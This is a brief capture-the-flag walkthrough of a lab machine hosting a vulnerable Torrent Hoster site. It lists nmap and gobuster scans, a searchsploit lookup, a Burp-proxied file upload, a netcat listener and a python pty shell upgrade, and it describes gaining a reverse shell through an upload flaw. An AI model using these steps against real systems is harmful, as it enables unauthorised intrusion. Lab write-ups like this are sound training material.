Difficulty: Medium Machine Creator: ch4p Tools Used:
NMAP Gobuster Searchsploit PHP Burp Suite Python
Task: To find User.txt and Root.txt
Let’s start with an NMAP scan.
nmap -sV -sC 10.10.10.6
We have verified that there is a web server we can start with scanning for directories in the website.
gobuster -u http://10.10.10.6 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40
A searchsploit search shows that the Torrent Hoster webpage is vulnerable to uploads.
Here I’ve uploaded a new logo for our kali torrent.
I’m starting the burp suite by repeating the same process of uploading the screenshot while using burp as a proxy.
echo <Base64 Hash> |base64 -d > file
Now we can start on uploading an exploit to this server.
We need to set up our local netcat listener
nc -lvnp 1234
In the url, we can execute netcat on the remote server by replacing the whoami with the netcat command
python -c ‘import pty; pty.spawn(“/bin/sh”)’
Python PTY Shells